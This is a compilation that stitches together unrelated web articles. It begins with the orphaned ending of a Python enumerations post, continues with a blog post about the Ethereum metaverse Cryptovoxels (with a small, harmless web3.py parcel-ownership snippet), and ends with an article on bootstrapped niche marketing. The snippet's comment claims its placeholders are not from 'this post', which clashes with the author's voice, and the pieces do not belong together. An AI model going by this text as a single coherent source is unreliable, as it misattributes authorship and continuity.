You had a look at a few examples and understood why it is good practice to use enumerations once in a while.
I hope you enjoyed reading the article.
Feel free to share it with your friends and colleagues!
Do you have feedback?
I am eager to hear it!
You can contact me via the contact form or other resources listed in the contact section.
If you have not already, consider following me on Twitter, where I am @DahlitzF, or subscribing to my newsletter!
Stay curious and keep coding!
title: A Look at Cryptovoxels description: The Metaverse Being Built on Ethereum author: Francesco Agosti image: https://fragosti.com/assets/img/cv-ready-player-one.jpg
The term “Metaverse” was originally coined by Neal Stephenson in his 1992 novel Snow Crash. In the Metaverse humans, as avatars, interact with each other and software agents, in a three-dimensional space that uses the metaphor of the real world. Stephenson used the term to describe a virtual reality-based successor to the Internet.
A more recent rendition of the Metaverse can be seen in the movie Ready Player One, where it is called “The OASIS”.
What is Cryptovoxels?
Cryptovoxels is a Metaverse that runs in your browser (and phone, and VR headset). It uses the Ethereum blockchain to track ownership of goods in its economy, most importantly property. It has come a long way since the original trailer was released.
Cryptovoxels is a virtual world powered by the Ethereum blockchain. Players can buy land and build stores and art galleries. Editing tools, avatars, text chat and voice chat are built in. — cryptovoxels.com
There are other similar projects on Ethereum, such as Decentraland and The Sandbox, but this post will focus on Cryptovoxels.
Why Ethereum?
From an implementation standpoint, there is no technical reason you need a blockchain to build a Metaverse. In fact, building Cryptovoxels on Ethereum likely came with its own unique set of challenges.
However, building on Ethereum also comes with some unique advantages. For one, it just fits the ethos. In Ready Player One the OASIS becomes so important that the company running it becomes one of the most valuable in the world. In fact, the OASIS is so valuable that the central conflict of the movie is about who owns and controls it.
Having Cryptovoxel parcel ownership be tracked on Ethereum provides users with strong guarantees that their assets cannot simply be taken away by the creators. While it is true that the entire game isn’t decentralized, and that the creators could change the game to ignore what Ethereum says, the fact that it is built on Ethereum shows a commitment to letting the users own the world.
This commitment has allowed Cryptovoxels to attract the right kind of early adopters, who have taken ownership of the world in their own right. More specifically, it has attracted designers, painters, modeling experts, architects, digital artists, and so on. These artists have done an amazing job in building out the world and making it a place worth exploring and hanging out in.
Finally, there is at least one more tangible advantage to building a Metaverse on Ethereum: existing assets and infrastructure. The Cryptovoxel world is highly compatible with the rest of the Ethereum ecosystem, especially the ERC-721 standard (also known as Non-Fungible Tokens).
Many users already own NFTs (such as CryptoKitties), and will see Cryptovoxels as a perfect place to display and sell them. Cryptovoxel parcels are also NFTs, and so are compatible with existing exchange infrastructure, which means the creators of Cryptovoxels never had to build an exchange to let their users trade parcels.
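Because parcels follow the ERC-721 standard, anyone can query their ownership directly from the chain with ordinary tooling. As a rough illustration, a web3.py sketch might look like the following; the node URL and contract address are placeholders of mine, not taken from this post:
# parcel_owner.py (illustrative only)
from web3 import Web3
NODE_URL = "https://example-node.invalid"  # placeholder JSON-RPC endpoint
PARCEL_CONTRACT = "0x0000000000000000000000000000000000000000"  # placeholder address
# Minimal ERC-721 ABI fragment: just the ownerOf function
ERC721_ABI = [{
    "name": "ownerOf",
    "type": "function",
    "stateMutability": "view",
    "inputs": [{"name": "tokenId", "type": "uint256"}],
    "outputs": [{"name": "", "type": "address"}],
}]
w3 = Web3(Web3.HTTPProvider(NODE_URL))
contract = w3.eth.contract(address=PARCEL_CONTRACT, abi=ERC721_ABI)
print(contract.functions.ownerOf(1).call())  # address that owns the parcel with token id 1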
What can you do?
While Cryptovoxels feels like a game, it is just an open world. There are no clear objectives. You do whatever you want.
Explore
One of the best things to do in Cryptovoxels is to wander around. Every time I explore, I find something new and surprising.
You can see that the map displays a few islands and neighborhoods, such as “Proxima” or “Moon”. At the time of writing, there are 31 neighborhoods and 4 islands, although more are coming online every week.
Each neighborhood has its unique look-and-feel. In Area 51, you’ll see a lot of alien themed content, and in Kitties, you’ll see a lot of references to and collectibles from the CryptoKitties game. Neighborhood building restrictions come into play as well, as some neighborhoods such as Frankfurt allow for taller buildings and therefore have a big city vibe.
Of course, neighborhoods are just composed of individual parcels with unique owners and unique builds — some more impressive than others. Take the DAI House for example, which is a tribute to the DAI cryptocurrency and boasts fountains and spinning 3D DAI models. Another example is the Token Smart Amphitheatre, which displays some impressive architecture and even a cafe, or Sugar Club where people go to listen to music and dance (yes, there is a dance button).
There are also quite a few personalities and magnates in Cryptovoxels, who are responsible for building and advertising some of the biggest builds and events. Artist, architect and “Photoshop Priest” Alotta Money recently advertised the opening party for the Voxel Hotel, which has to be the most impressive build I’ve seen in Cryptovoxels so far.
In fact, as recently as yesterday, people have been gathering at the Voxel Hotel and elsewhere for legitimate meet-ups and events. Many of these meet-ups are well organized and have considerable thought put into them.
There are plenty of secrets to discover as well, as some of the best builds and experiences are hidden away. If you check out EtherBrews it appears to be a simple brewery on the water, but if you go inside and fly over the wall, you’ll find a beautiful tree. Some builds are straight up puzzles, like Yours Truly Puzzle (can you get in?). Finally, you may even find games like Breakout appear on random corners of the world since better scripting functionality has been added.
The above only scratches the surface of what you can explore in Cryptovoxels. You can watch live events as Cryptovoxels supports YouTube embeds and Twitch streams, you can go shopping (more on that later) and even pray in a virtual church if that’s your thing.
Build
After you’re done exploring, you may be inspired to build something yourself. Once you purchase a parcel, or discover one in “sandbox” mode, you’ll find that it’s pretty easy to get going, but much harder to pull off complex builds.
At the most basic level, if you press “tab” on your property you’ll see a build menu pop-up with tons of options. If you head over to “Tiles” and select your preferred tile color and pattern, you can place them wherever you want in the bounds of your property!
If this reminds you of Minecraft, you’re right. Ben Nolan, the founder, says that Minecraft was a big inspiration for the project.
I was inspired by Minecraft and loved the idea of a Minecraft city that is owned by its users — Ben Nolan, Founder of Cryptovoxels
That explains the basics, but as you may have noticed from the YouTube video, there are tons of tutorials online. Once you get more advanced, you’ll likely be playing with Vox files which allow you to import more granular assets from external editors.
A Metaverse would not be complete without an economy. The main thing people exchange in Cryptovoxels is the parcels themselves, which can be bought and sold on OpenSea and TokenTrove. On the OpenSea activity page, you can see that 277 ETH (approx. $70,000) worth of parcels has been traded this week, and 8480 ETH (approx. $2,000,000) worth has been traded in total. On average, parcels have gone for 1.9 ETH (approx. $475).
Above you can see the distribution of the ETH prices (in wei) for settled trades, a plot of ETH price vs. parcel height, and a plot of ETH price vs. parcel area over the past month (May 2020) or so. While you do see a lot of sales occur at the 1.5 ETH (approx. $375) mark, you also see some parcels go for over 10 ETH (approx. $2,500)! The plots show that while there is some noise, price is generally correlated with the size of the parcel.
It’s worth calling out that a lot more stuff is being exchanged in Cryptovoxels. For one, most of the world is an art gallery where the art is for sale. The art ranges from game collectibles (like CryptoKitties) to photography to classical art that has been tokenized.
On top of that, wearables have gotten incredibly popular lately. Wearables are items that you can put onto your avatar (you can also claim handles, and change your skin by the way). Entire malls, brands and promotional videos have emerged as a result. People are going nuts over these virtual products that are entirely generated by the community.
This is what it looks like when your avatar is completely decked out.
How to get a parcel
If the prices you see for parcels on OpenSea are a bit out of your price range, you should know that new parcels are minted every Tuesday at approximately 5pm PST. To get in on the action, the best first step is to join the Cryptovoxels Discord, where the #general and #new-island channels will be the most relevant.
Every Tuesday the Cryptovoxels team releases new islands around Origin City. The process is likely to change in the future, but the way it works for now is that the team will bulk sell 20-30 new properties at prices from 1 ETH and above (perhaps lower, depending on the island).
To see the parcels before they go on sale, you can check OpenSea for “Recently Born” parcels, select the parcel that you’re interested in, and press “View on Cryptovoxels” to visit the parcel itself. Once the sale goes live, you’ll likely want to filter for that specific island, and sort by price.
If you are technically savvy, I’ve written a very simple script that will participate in the sales for you. However, unless you understand the code, I recommend taking the OpenSea approach. In my experience, it has been very easy to get a parcel this way.
When you succeed feel free to come say hi at my parcel!
Final thoughts
It’s not too late to join the party. The community is very welcoming and the Cryptovoxels team seems to be always implementing feature requests from people in the Discord channel. It’s a lot of fun to see it evolve, and I’m sure it will be a lot different just a couple of months from now.
As mentioned above, new parcels are being added all the time. You can check out some awesome parcel stats at this Dune Analytics dashboard.
title: Spreading the Word: How to Do Marketing on a Shoestring Budget description: Learn about the three components to spreading the word efficiently, all interacting with each other: tribes, water coolers, and word-of-mouth. author: Arvid Kahl image: https://i2.wp.com/thebootstrappedfounder.com/wp-content/uploads/2020/06/SocialShareSpreadingTheWord.png?fit=1200%2C628&ssl=1
Reading Time: 5 minutes
One beautiful thing about a niche is that there is a certain similarity between the people in it. They are likely to frequent the same social media, read the same blogs, visit the same websites. They often are organized in communities where word of mouth spreads quickly.
You can leverage the density of these networks by becoming a part of them. Genuinely participate in niche communities. Don’t just use them as a marketing platform. Contribute before you advertise. Better yet, don’t advertise at all: create meaningful content around your product and share it in a way that is helpful to people even if they never engage with the product directly.
Three components are essential to spreading the word efficiently, and they all interact with each other: tribes, water coolers, and word-of-mouth. And they are all quite affordable.
The Power of Tribes
You want to become part of and eventually lead a tribe. Tribes are communities that long for connection and shared interests, and members of a tribe follow the same community leaders. Facilitate more connection or satisfy people’s interests, and you will be a voice in the community that your potential customers will listen to.
Tribes form around all kinds of topics. Some are obvious in our day-to-day lives, like fans of sports clubs. Others are extremely niche and highly virtual, like some obscure internet forum of carpet aficionados. But they are essentially the same: they all revolve around a central interest, and people talk about it with each other.
This makes tribes a great audience for your product. A very homogeneous audience can be marketed to quite easily, as you know exactly where you can reach them and what language they speak.
The Power of the Water Cooler
Find the water cooler. The locations where your customers congregate when they are not hard at work can provide insightful information, as people talk more freely there than in professional circles.
Most of these water coolers are found in social networks like Facebook or Twitter. Reddit is a perfect place to look, as the sheer amount of specific subreddits makes it quite likely that there will be a vibrant community for your niche audience. Tribes are notorious for having very active water coolers, and once you find one, becoming a member is very worthwhile.
Listen to what people ask and complain about and offer your product embedded in more general advice. Shameless promotion is usually frowned upon in these communities, so you will need to provide something helpful and meaningful along with your plug. It is beneficial to become an actual member of the community before doing any intentional marketing. This will help you learn the language of the tribe and give you a chance to communicate with people, establishing yourself as a genuine member of their group.
Water coolers are wonderful for your content marketing in two ways. Initially, you will have the opportunity to see what your audience is interested in because that’s the content they share and engage with. Once you’ve understood what works for them and what does not, you can create content that you can be sure your audience will enjoy. Since you’ve already been a member of the community for a bit, you can provide quality content and market your product at the same time.
The Power of Word of Mouth
Word of mouth is the highest-converting way of spreading the word. Convince people to convince others and give them the tools to do so. Create easy-to-consume and easy-to-share content that existing customers can forward to new prospects. Allow them to mentor their peers into using your product by adding means to connect inside the product. This works particularly well with a referral system.
Word of mouth works mostly for low-touch businesses. Because these companies have a large number of customers and prospects that can take a look at a product through easy and self-service signups, word of mouth can happen without your intervention or encouragement.
In high-touch businesses, word of mouth works differently. Most of the time in B2B industries, your product is not very shareable because it gives an edge to the businesses that use it. Instead of everyone in the industry talking about your product, you want everyone in the businesses you would like as customers to talk about your solution before you reach out through direct sales.
There is one thing about word of mouth you need to be aware of: you have almost no means to censor or steer the conversation. If there is something negative about your business, communities and tribes will discuss it. For many founders, hearing people complain about their service is painful, but it’s a normal part of business. In the end, even a neutral or negative conversation will keep your brand on the minds of your prospects and remind them that you’re at least trying to help.
Your Most Effective Marketing Strategy: Helping Your Tribe
Unlike large agencies, bootstrapped founders usually don’t want to spend tens of thousands of dollars per month on social media advertisements. That doesn’t mean you can’t leverage social media for your marketing. Quite the opposite: a well-executed social media strategy can outperform pay-per-click ads significantly — it definitely did for us at FeedbackPanda.
We experimented with paid ads, of course. And we didn’t see any additional engagement compared to our existing content marketing and outreach strategies. So we doubled down on that, and it was the right choice for us.
And there was a very basic assumption underpinning all of the marketing efforts: it’s not about us pushing a message into an audience of receivers, hoping for signup conversions. It’s about fostering a community that is eager to spread our messages, build our brand, and give us recognition and reputation. To accomplish that, you have to focus on building a community first, and on your own messaging second. You need to help your tribe grow stronger, and they will be an amplifier for your messages.
If you’re fortunate enough to sell to a very focused niche that is at best a highly active tribe or at worst a loose community, here are a few ways you can help them:
Facilitate communication. Allow for more connections between the people in your niche. Enable existing communities or build one yourself using community software like Circle.so or Tribe.so. Interview leaders in the community on your blog, giving them more reach and their voices more impact. Interview members of your community, showcasing both their uniqueness and their belonging to the tribe at the same time. Syndicate user-generated content on your blog. Turn regular tribe members into influencers through your outlets.
Facilitate exchange. From day one, envision your product to have a component where your users can share something. It can be data, insights, best practices, support, frankly anything. Give your users a chance to empower each other, and they will make sure to increase their impact radius by carrying your service to their peers. Offer free resources from inside the community, and share your content with other outlets in the niche.
Produce and syndicate valuable content. Whether you’re producing a podcast, regular blog posts, a video series, or articles with ratings, reviews, and testimonials: as long as you provide helpful and meaningful content for your niche, you will have followers who spread it. Since your content is written for your customers, any new reader is likely to be an excellent candidate to become a new customer as well.
All of this generates trust. Trust is the currency of tribes, and with enough trust, people want to listen to you. You don’t need to spend money on marketing, and frankly, you couldn’t buy this kind of relationship with your customers if you wanted to.
Use the fact that you’re selling to a niche audience to your advantage and become a leader in your tribe. Help it grow, help your community members to learn and get ahead. This way, you’ll end up with a never-ending stream of eager customers who trust you and amplify your messages.
Arvid Kahl is a software engineer turned entrepreneur. He co-founded FeedbackPanda, an online teacher productivity SaaS company, with his partner Danielle Simpson. They sold the company for a life-changing amount of money in 2019, two years after founding it.
Arvid writes on TheBootstrappedFounder.com because bootstrapping is a desirable, value- and wealth-generating way of running a company.
In over a decade of working in startup businesses of all sizes, Arvid has learned a thing or two about what works, what doesn't, and how to increase the chances of building a successful business.